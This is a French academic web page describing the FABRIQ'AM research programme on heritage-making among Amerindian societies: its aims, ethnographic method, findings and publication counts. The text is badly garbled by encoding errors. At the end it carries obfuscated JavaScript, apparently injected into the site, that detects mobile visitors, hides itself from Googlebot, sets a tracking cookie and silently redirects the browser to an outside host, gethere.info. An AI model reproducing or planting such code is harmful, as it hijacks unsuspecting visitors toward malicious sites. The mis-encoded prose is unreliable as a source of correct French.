FABRIQ’AM

La fabrique des « patrimoines » :
MA�moires, savoirs et politiques en AmA�rique indienne aujourd’hui

Programme de recherche financA� par l’ANR (2013-2016)
(Projet ANR-12-CULT-005 : Programme SOCIA�TA�S – a�?A�MERGENCES ET A�VOLUTION DES CULTURES ET DES PHA�NOMA?NES CULTURELSa�?, 2012)

EspaA�olA� A�EnglishA� A�PortuguA?s

(Cliquez sur les images pour agrandir)

Le projet Fabriq’am Populations A�TUDIA�ES
poster-3-le-projet-fabriqam poster-1-populations-etudiees
JournA�es d’A�tude Quelques Fabri’cas
poster-2-journees-detudes poster-4-quelques-fabricas

RA�SUMA� DU PROGRAMME SCIENTIFIQUEA�:

Mise en patrimoine et recomposition de rA�gimes de savoir

En AmA�rique latine oA? le multiculturalisme et la gestion des identitA�s indigA?nes constituent un enjeu politique majeur, au point da��inflA�chir les modes de gouvernance A� la��A�chelle locale, les populations amA�rindiennes se trouvent contraintes de mettre en avant des caractA�ristiques ethniques ou culturelles pour se positionner sur la��A�chiquier national.
Alors que pour participer A� la vie citoyenne, les populations amA�rindiennes doivent ainsi faire appel A� des traits culturels qui les caractA�riseraient, elles rencontrent dans cette interaction une comprA�hension externe dA�calA�e, voire antinomique, de leurs cultures et de leurs personnes. Da��une part, le rapport au passA� A� inventorier, A� remA�morer et A� reproduire, tel qua��il est vA�hiculA� institutionnellement, se distingue des conceptions autochtones de ce qui doit se conserver ou sa��oublier, des maniA?res de transmettre les connaissances et les savoirs, ainsi que des modes da��historicitA�. Da��autre part, les formes de transmission mA�morielle au sein des groupes amA�rindiens sont aussi, pour beaucoup, dA�sormais investies au sein da��un monde globalisA� en tant que ressources mobilisables pour obtenir des droits, conforter une identitA� collective, voire de nouvelles formes da��indianitA�.
Le projet cherchait A� saisir comment sa��expriment et sa��articulent les maniA?res subjectives dont les sociA�tA�s amA�rindiennes A�tudiA�es conA�oivent leur rapport A� l’histoire et au temps, dans et en deA�A� de la��interface avec la sociA�tA� hA�gA�monique qui leur impose les termes de leurs cultures.

Une approche par la��ethnographie da��expA�riences autochtones

Les chercheurs rassemblA�s dans ce projet A�taient engagA�s de longue date sur les terrains A�tudiA�s, et pour la plupart ils ont assistA� A� la��A�mergence de la��objet A� patrimoine A� au cours de leurs enquA?tes. Cela leur a permis de proposer une mise en perspective temporelle des constructions patrimoniales et da��engager une analyse des contextes de ces processus, en amont et en aval. Une trentaine da��A�tudes de cas ont A�tA� menA�es selon une approche processuelle et comparative abordant la patrimonialisation par les questions des transmissions mA�morielles et des savoirs, rattachA�es A� des processus historiques. Ces recherches ont montrA� comment et dans quels contextes les diffA�rents dispositifs locaux, da��ordre politique, identitaire et relationnel, intra et interculturels, sont dA�ployA�s pour rA�pondre (ou non) aux politiques patrimoniales.

RA�sultats

Ces analyses ont exposA� la capacitA� rA�flexive des sociA�tA�s A�tudiA�es dont la culture, dorA�navant reconnue, devient un enjeu politique et/ou A�conomique. A� la logique locale de ce que la��on est sa��ajoute alors a�� de maniA?re simultanA�e mais souvent diffA�renciA�e a�� une logique patrimoniale de ce que la��on a. Ni culturalisme angA�lique ni essentialisme stratA�gique, la��A�tude de la mise en patrimoine en milieu amA�rindien a permis de saisir le rA�investissement local dans le domaine de la culture comme enjeu social et politique majeur ancrA� dans la modernitA�.
Le terrain de la patrimonialisation sa��est avA�rA� une arA?ne oA? s’exposent, dans un rapport de force asymA�trique, des visions idA�ologiques distinctes sur la faA�on dont les diffA�rences culturelles doivent A?tre affirmA�es et reconnues et sur ce qui constitue, en derniA?re instance, la diffA�rence.

Production scientifique

Les rA�sultats de cette recherche ont A�tA� A�chafaudA�s au fil da��un atelier de dA�marrage ouvert, et da��un autre de finissage interne, de six journA�es de prA�sentation des travaux menA�s par les membres du projet et, par la suite, de 20 journA�es da��A�tude qui ont suivi les axes de recherche du programme. Ces activitA�s collectives ont produit finalement 40 publications internationales et 40 en France (ouvrages, numA�ros spA�ciaux de revues, articles, chapitres de livres), 49 communications internationales et 173 en France, trois colloques internationaux, quatre films (certains encore en prA�paration) et cinq confA�rences de divulgation scientifique. (Voir la liste des publications actuelles)

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}